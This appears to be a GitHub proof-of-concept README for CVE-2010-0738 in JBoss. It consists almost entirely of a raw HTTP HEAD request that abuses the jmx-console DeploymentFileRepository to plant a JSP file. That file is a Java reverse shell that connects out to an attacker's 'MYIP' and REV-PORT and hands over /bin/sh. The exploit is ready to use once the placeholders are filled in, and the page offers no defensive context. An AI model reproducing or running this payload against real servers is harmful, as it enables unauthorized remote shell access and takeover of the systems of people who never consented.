4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2010-0738-linux
HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=hax0r3&arg2=.jsp&arg3=+++++++++++++++%3C%25%40page+import%3D%22java.lang.*%22%25%3E+++++++++++++++++++++++++%3C%25%40page+import%3D%22java.util.*%22%25%3E+++++++++++++++++++++++++%3C%25%40page+import%3D%22java.io.*%22%25%3E+++++++++++++++++++++++++%3C%25%40page+import%3D%22java.net.*%22%25%3E++++++++++++++++++++++++++%3C%25+++++++++++++++++++++++++++++++++class+StreamConnector+extends+Thread+++++++++++++++++++++++++++++++++%7B+++++++++++++++++++++++++++++++++++++++++InputStream+is%3B+++++++++++++++++++++++++++++++++++++++++OutputStream+os%3B++++++++++++++++++++++++++++++++++++++++++StreamConnector%28+InputStream+is%2C+OutputStream+os+%29+++++++++++++++++++++++++++++++++++++++++%7B+++++++++++++++++++++++++++++++++++++++++++++++++this.is+%3D+is%3B+++++++++++++++++++++++++++++++++++++++++++++++++this.os+%3D+os%3B+++++++++++++++++++++++++++++++++++++++++%7D++++++++++++++++++++++++++++++++++++++++++public+void+run%28%29+++++++++++++++++++++++++++++++++++++++++%7B+++++++++++++++++++++++++++++++++++++++++++++++++BufferedReader+in++%3D+null%3B+++++++++++++++++++++++++++++++++++++++++++++++++BufferedWriter+out+%3D+null%3B+++++++++++++++++++++++++++++++++++++++++++++++++try+++++++++++++++++++++++++++++++++++++++++++++++++%7B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++in++%3D+new+BufferedReader%28+new+InputStreamReader%28+this.is+%29+%29%3B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++out+%3D+new+BufferedWriter%28+new+OutputStreamWriter%28+this.os+%29+%29%3B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++char+buffer%5B%5D+%3D+new+char%5B8192%5D%3B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++int+length%3B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++while%28+%28+length+%3D+in.read%28+buffer%2C+0%2C+buffer.length+%29+%29+%3E+0+%29+++++++++++++++++++++++++++++++++++++++++++++++++++++++++%7B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++out.write%28+buffer%2C+0%2C+length+%29%3B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++out.flush%28%29%3B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++%7D+++++++++++++++++++++++++++++++++++++++++++++++++%7D+catch%28+Exception+e+%29%7B%7D+++++++++++++++++++++++++++++++++++++++++++++++++try+++++++++++++++++++++++++++++++++++++++++++++++++%7B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++if%28+in+%21%3D+null+%29+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++in.close%28%29%3B+++++++++++++++++++++++++++++++++++++++++++++++++++++++++if%28+out+%21%3D+null+%29+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++out.close%28%29%3B+++++++++++++++++++++++++++++++++++++++++++++++++%7D+catch%28+Exception+e+%29%7B%7D+++++++++++++++++++++++++++++++++++++++++%7D+++++++++++++++++++++++++++++++++%7D++++++++++++++++++++++++++++++++++try+++++++++++++++++++++++++++++++++%7B+++++++++++++++++++++++++++++++++++++++++Socket+socket+%3D+new+Socket%28+%22MYIP%22%2C+REV-PORT+%29%3B+++++++++++++++++++++++++++++++++++++++++Process+process+%3D+Runtime.getRuntime%28%29.exec%28+%22%2Fbin%2Fsh%22+%29%3B+++++++++++++++++++++++++++++++++++++++++%28+new+StreamConnector%28+process.getInputStream%28%29%2C+socket.getOutputStream%28%29+%29+%29.start%28%29%3B+++++++++++++++++++++++++++++++++++++++++%28+new+StreamConnector%28+socket.getInputStream%28%29%2C+process.getOutputStream%28%29+%29+%29.start%28%29%3B+++++++++++++++++++++++++++++++++%7D+catch%28+Exception+e+%29+%7B%7D+++++++++++++++++++++++++%25%3E&arg4=True HTTP/1.1
Host: hostx:portx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://hostx:portx/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository